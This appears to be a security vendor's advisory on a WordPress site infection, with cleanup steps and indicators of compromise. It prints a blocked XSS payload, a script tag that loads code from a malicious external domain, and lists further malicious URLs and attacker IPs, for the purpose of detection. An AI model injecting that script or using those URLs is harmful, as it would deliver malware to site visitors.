Recently, we noticed several aggressive attacks originating from two IPs 31.43.191.223 ( South Africa ), and 89.248.165.53 ( Netherlands ). To counter-attack these malicious requests, we are blocking the following IP ranges: 31.43.191.0/24, and 89.248.165.0/24.
Try our free site check.
Cleanup steps
- Perform a full website backup, including web files and database.
- Re-install the core WordPress files, including wp-config.php.
- Check all the plugins, delete the malicious folders, and apply the available updates. Avoid using nulled scripts or plugins downloaded from third-party sources.
- Review users with admin privileges and change all the passwords.
How to clear the malicious script
- Review the theme settings and look for the “Custom code” section. Check all the entries, including custom css, custom javascript, etc.
- Update all the site components.
Blocked for XSS: Cross Site Scripting in POST
<script src="https://gll.instantcontentflow.com"></script>
Malicious URLs
https://gll.instantcontentflow.com/
https://lyubov.empatiya.net/?news&s
https://distributemodel.com/emr2zm1sk?key=a4f93d2fc3497f24dc29b96c78a0b459
Bad IPs: 172.240.108.76.
Cloudflare nameservers:
1. instantcontentflow.com
jaime.ns.cloudflare.com
kelly.ns.cloudflare.com
2. empatiya.net
elsa.ns.cloudflare.com
vin.ns.cloudflare.com
Sucuri check:
Resource from a blacklisted domain gll.instantcontentflow.com
If you’ve recently noticed suspicious files installed, we can help with a free site check.
Our skilled malware analysts are available 24/7 to fix hacked WordPress websites and clean up malware – reach out to us if you need help.
Hacked website? Try our free site check.
A security analyst will perform a free thorough external site check within the next minutes.